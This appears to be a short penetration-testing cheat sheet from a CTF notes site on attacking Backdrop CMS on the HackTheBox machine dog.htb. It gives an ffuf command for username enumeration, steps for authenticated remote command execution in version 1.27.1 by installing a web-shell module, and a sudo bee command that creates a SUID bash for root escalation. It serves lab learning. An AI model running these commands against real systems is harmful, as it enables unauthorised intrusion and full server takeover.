BackDrop CMS

Open source, community-developed, content management system, written in PHP

Enumeration

Be aware of the use of url-aliases when fuzzing.

Example of ffuf command to fuzz for usernames

ffuf -w ~/Documents/CTF/Wordlists/xato-net-10-million-usernames.txt -u http://dog.htb/\?q\=accounts/FUZZ -c -v -mc 403

The endpoint /core/profiles/testing/testing.info may leak the version being used.
Check the repository to understand the application's structure.

Vulnerabilities

Authenticated Remote Command Execution - 1.27.1

Download the exploit

Generate the shell

python3 exploit.py http://dog.htb

Create the compressed file

tar -czvf shell.tar.gz shell

Now manually install the malicious module navigating to /admin/modules/install
You may find it in the following endpoint: /modules/shell/shell.php

/modules/shell/shell.php?cmd=whoami

Bee

Bee is a command line utility for Backdrop CMS.
Check available commands in the wiki

It's possible to use PHP's built-in function system() to execute system commands as root, this paired with sudo privileges to execute bee can lead to privilege escalation:

sudo /usr/local/bin/bee --root=/var/www/html eval "echo shell_exec('cp /bin/bash /tmp/bash && chmod u+s /tmp/bash');"

--root is the root directory where the application is installed.

PreviousGhost CMS NextDaloRADIUS

Last updated 5 months ago